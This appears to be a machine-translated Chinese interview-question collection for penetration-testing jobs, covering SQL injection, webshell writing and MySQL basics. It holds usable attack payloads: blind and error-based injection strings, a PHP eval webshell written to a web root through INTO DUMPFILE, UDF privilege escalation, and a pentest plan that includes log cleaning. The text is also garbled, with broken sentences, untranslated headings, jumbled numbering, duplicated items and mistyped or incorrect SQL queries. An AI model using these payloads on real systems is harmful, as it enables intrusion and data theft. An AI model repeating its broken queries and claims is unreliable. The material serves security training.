Self-introduction
Have you ever dug src?
How do you usually learn web penetration? Is there any actual combat? Have you ever successfully found a vulnerability?
What tools have you come into contact with when doing web penetration
? What is the xxe vulnerability? What is ssrf?
What is the direction you are responsible for when you
are playing ctf ? How to judge whether a database is mysql or oracle? Types of sql injection and how to use it? Let’s talk about the principle and defense ideas of sql injection. What language do you use when doing development? What framework do you use when doing java development? Can you do java security development? Have you ever done Android development? Have you ever written tools in python? Which vulnerability is used by msf, and has it successfully rebounded? What did you mainly do when protecting the network? Let’s talk about your understanding of security products . The company now needs people who can do app security. If you want to do it now, would you learn it, or are you interested, or do you have other things you want to do ? Talk about the idea of intranet penetration Interview questions collection
1. Summary of high-frequency interview questions in Dachang
This time I spent three months sorting out the interview questions for the network security service positions of major security vendors (including but not limited to: security service engineer, security operation engineer, security operation and maintenance engineer, security attack and defense engineer").
Without further ado, let's learn together
At present, there are still a lot of impreciseness and redundancy, and I implore my friends to correct and modify!
1.1 . SQL injection protection methods
Invalid authentication and session management
Cross-site scripting attacks XSS direct
reference to insecure objects
Security configuration errors
Sensitive information leakage
Lack of functional-level access control
Cross-site request forgery CSRF
uses components with known vulnerabilities Unauthenticated
redirection and forwarding Penetration testing is practical, but many people have no way to speak. 1.3. Given a website, how did you conduct the penetration test? Under the premise of obtaining written authorization.
1) Information collection
Obtain the whois information of the domain name, obtain the registrant's email address, name and phone number, etc.
Query server side sites and sub-domain sites, because the main site is generally more difficult, so first check if there are any common cms or other loopholes in the side sites.
Check the server operating system version, web middleware, and see if there are known vulnerabilities, such as IIS, APACHE, and NGINX analysis vulnerabilities Check the
IP, scan the IP address port, and detect the vulnerability of the corresponding port, such as rsync, Heartbleed, mysql, ftp, ssh weak passwords, etc. Scan the website directory structure to see if you can traverse the directory, or leak sensitive files, such as php probe google hack to further detect website information, background, and
sensitive
files
2) Vulnerability scanning
Start to detect vulnerabilities, such as XSS, XSRF, sql injection, code execution, command execution, unauthorized access, directory reading, arbitrary file reading, downloading, file inclusion, remote command execution, weak passwords, uploading, editor vulnerabilities, brute force cracking,
etc.
3) Exploitation
Use the above methods to get webshell, or other permissions
4) Privilege Escalation
Privilege escalation server, such as udf privilege escalation of mysql under windows, serv-u privilege escalation, vulnerabilities of lower versions of windows, such as iis6, pr, Brazilian barbecue, linux Tibetan cow vulnerability, linux kernel version vulnerability escalation, mysql system privilege escalation under linux and oracle low privilege
escalation
5) Log cleaning
6) Summary report and repair plan
1.4. Penetration testing process
Project interview
Information collection: whois, website source IP, side station, C-segment website, server system version, container version, program version, database type, second-level domain name, firewall, maintainer information Vulnerability scanning: Nessus, AWVS manual mining: Logical vulnerabilities Verification vulnerabilities Repair suggestions (if any) Baseline inspection/re-inspection vulnerabilities Output report Overview Basic information of the test Test scope Test time Test tasks Test process Comprehensive analysis of information security
risks
Overall
risk
analysis
Risk
impact
analysis
System
Security
Analysis
Security
Vulnerabilities
List
Solution
Suggestions
Retest
Report
SQL
Interview
Questions
1.5. The type of SQL injection is
based on error injection.
Boolean-based injection, which judges the true or false condition according to the returned page. The
time-based blind injection cannot judge any information based on the content returned by the page. Use conditional statements to check whether the time delay statement is executed (that is, whether the page return time has increased).
Wide byte injection
Joint query, can use union injection.
Heap query injection, which can execute the injection of multiple statements at the same time.
7.6. The principle of SQL injection
By inserting SQL commands into Web forms to submit or input query strings for domain names or page requests, the server is finally tricked into executing malicious SQL commands. Often unchecked or insufficiently checked user input data or code writing issues accidentally become code execution.
1.7. How to defend against SQL injection
Close application error prompts
Add waf
to filter input
Limit input length
Limit database permissions, drop/create/truncate permissions carefully grant
precompiled SQL statements, generally use ? as a placeholder in python and Php. This method is to solve the sql injection using placeholder parameters from the perspective of programming framework, and it can only be said to prevent injection to a certain extent. There are also buffer overflows, termination characters, etc.
Encryption and security of database information (leading to cryptography). Do not use md5 because there is a rainbow table. Generally, add salt after md5 and then md5.
Clear programming specifications, pairing/automated code review, and a large number of ready-made solutions (PreparedStatement, ActiveRecord, ambiguous character filtering, and only accessible stored procedures balabala) have made the risk of SQL injection very low.
How to prevent injection in a specific language, what security framework
1.8 and sqlmap are used, and how to inject an injection point?
If it is a get model, directly, sqlmap -u "such as point URL".
If it is a post type such as point, you can use sqlmap -u "injection point URL" --data="post parameter" If it is a
cookie, X-Forwarded-For, etc., when you can access it, use burpsuite to capture the package, replace the injection with *, put it in the file, and then sqlmap -r "file address" 1.9. What is the difference between mysql website injection, above 5.0 and below 5.0
?
5.0 was released 10 years ago, and now it’s 5.7, it’s meaningless
Below 5.0, there is no information_schema system table, and it is impossible to list names, etc., and can only violently run table names.
Below 5.0 is multi-user single operation, and above 5.0 is multi-user multi-operation.
1.10. MySQL storage engine?
1. InnoDB: the mainstream storage engine. Support transactions, support row locks, support non-locking reads, support foreign key constraints
Provides MySQL with a transaction-safe (ACID-compliant) storage engine with commit, rollback, and crash recovery capabilities. InnoDB locks at the row level and also provides an Oracle-like non-locking read in the SELECT statement. These features increase multi-user deployment and performance. In SQL queries, you can freely mix InnoDB tables with other MySQL table types, even in the same query. The InnoDB storage engine maintains its
own buffer pool for caching data and indexes in main memory. InnoDB organizes its tables and indexes in a logical tablespace, which can contain several files (or raw disk files). This is different from MyISAM tables, for example, where each table is stored in a separate file. InnoDB tables can be of any size, even on operating systems where the file size is limited to 2GB.
InnoDB supports foreign key integrity constraints. When storing data in a table, each table is stored in the order of the primary key. If no primary key is specified in the table definition, InnoDB will generate a 6-byte ROWID for each row and use it as the primary
key
. Put the data in the table in the memory, and the concurrency performance is poor.
4. MERGE, Archive, etc. are not commonly used
1.11. What is a transaction?
A transaction is a set of atomic SQL statements or an independent unit of work. If the database engine can successfully apply this set of SQL statements to the database, it will be executed. If any statement cannot be executed due to a crash or other reasons, then all statements will not be executed. That is to say, the statements in the transaction either all execute successfully or all fail to execute.
A typical example of a banking application:
Suppose the bank's database has two tables: a check table and a savings table. Now a customer A wants to transfer 2,000 yuan from his checking account to his savings account, then at least three steps are required:
a. Check that the balance of A's checking account is higher than 2,000 yuan;
b. Subtract 2,000 yuan from A's checking account balance;
c. Add $2,000 to A's savings account balance.
These three steps must be packaged in one transaction. If any step fails, all steps must be rolled back. Otherwise, A, as a bank customer, may inexplicably lose 2,000 yuan, and something goes wrong. This is a typical transaction. This transaction is the smallest indivisible unit of work. All operations in the entire transaction are either submitted successfully or rolled back if they fail. It is impossible to execute only part of them. This is also the atomic feature of a transaction.
1.12. Read locks and write locks
Read locks are shared, that is, they do not block each other, and multiple clients can read the same resource at the same time without interfering with each other. Write locks are exclusive, that is, a write lock will block other write locks and read locks. Only in this way can it be ensured that only one user can perform writing within a given time, preventing other users from reading the same resource being written. Write locks have higher priority than read locks.
1.13. MySQL index
An index is a data structure that helps MySQL obtain data efficiently. MYISAM and InnoDB storage engines only support BTree indexes; MEMORY and HEAP storage engines can support HASH and BTREE indexes.
1.14. ORDER BY can add field name, expression and field position after the order by injection , and the field position needs to be an integer.
1.15. What is GPC? How to bypass after GPC?
If magic_quotes_gpc=On, the PHP parser will automatically add the escape character "\" to the data from post, get, and cookie to ensure that these data will not cause pollution to programs, especially database statements, due to special characters (characters considered to be PHP).
1.16. What is the difference between one @ and two @ in Mysql? @
is a user variable, use SET @var1=1 to assign
@@ to a system variable, including the global variable show global variables \G; and the session variable show session variables \G;
1.17. Injecting/bypassing commonly used functions
1. Blind injection based on Boolean SQL
left(database(),1)>'s'
ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp正则注入 select user() regexp '^[a-z]';
select user() like 'ro%'
2、基于报错的SQL盲注
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通过floor报错 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10).exp()select * from test where id=1 and exp(~(select * from(select user())a));
3. How to judge the delayed injection?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
1.18. What do blind injection and delayed injection have in common?
It is a character-by-character judgment
1.19. How to get the webshell of a website?
Upload, edit templates in the background, sql injection write files, command execution, code execution,
some cms vulnerabilities that have been exposed, such as dedecms background can directly create script files, wordpress upload plug-ins include script files zip archives, etc.
1.20. What are the functions for sql injection to write files?
select 'one sentence' into outfile 'path'
select 'one sentence' into dumpfile 'path'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
1.21. Various questions about writing shells
1. What functions are used to write shells?
select '<?php phpinfo()> into outfile 'D:/shelltest.php'
dumpfile
file_put_contents
2. What should I do if the outfile cannot be used?
select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll'; UDF rights can be raised https://www.cnblogs.com/milantgh/p/5444398.html 3. What is the difference between dumpfile and outfile
? outfile is suitable for importing libraries, and a new line will be written and escaped at the end of the line, so it cannot be written into a binary executable file.
4. Can sleep() write shell?
5. What are the conditions for writing a shell?
User permissions
Directory read and write permissions
Prevent command execution: disable_functions, disable disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source, but you can use the dl extension to execute commands or ImageMagick vulnerabilities https://www.waitalone.cn/imagemagic-bypass- disable_function.html open_basedir: Limit user-operable files to a certain
directory
1.22. What are the functions for sql injection to write files?
select 'one sentence' into outfile 'path'
select 'one sentence' into dumpfile 'path'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
1.23. Secondary injection of sql
When inserting data into the database for the first time, only use addslashes or use get_magic_quotes_gpc to escape the special characters in it. When writing to the database, the original data is still retained, but the data itself is still dirty data.
After storing the data in the database, the developer considers the data to be credible. When the next query is required, the dirty data is directly taken out from the database without further inspection and processing, which will cause a secondary injection of SQL.
On a dating website, filling in the age is an injection point, and the page will display how many users are of the same age as you. Use and 1=1 to determine the injection point, use order by to detect the number of columns, and union select to detect which column the output point is.
Storm database group_concat(schema_name) from information_schema.schemata
storm table group_concat(table_name) from information_schema.schemata where table_schema='hhh'
to get data concat(flag) from flag
Repair: When fetching data from a database or file, it is also necessary to escape or filter.
1.24, the difference between SQL and NoSQL
SQL relational database, NoSQL (Not only SQL) non-relational database
1. Advantages of SQL
A relational database refers to data represented by a relational mathematical model, in which the data is described in the form of a two-dimensional table.
Stable structure, not easy to modify, commonly used for joint table query
High query ability, can operate very complex queries
High consistency, data processing will use blockade to ensure that the data will not be changed
The table is logical and easy to understand
2. SQL shortcomings
Not suitable for high-concurrency reading and writing
Not suitable for efficient reading and writing of massive data
Multiple levels, low scalability High cost of
maintaining consistency
Involving joint table queries, complex and slow
3. NoSQL advantages
Use key-value pairs to store data
Since there is no relationship between data, it is easy to expand and query.
The data structure is flexible, and each data can have a different structure.
Due to the reduced consistency requirements, the query speed is faster.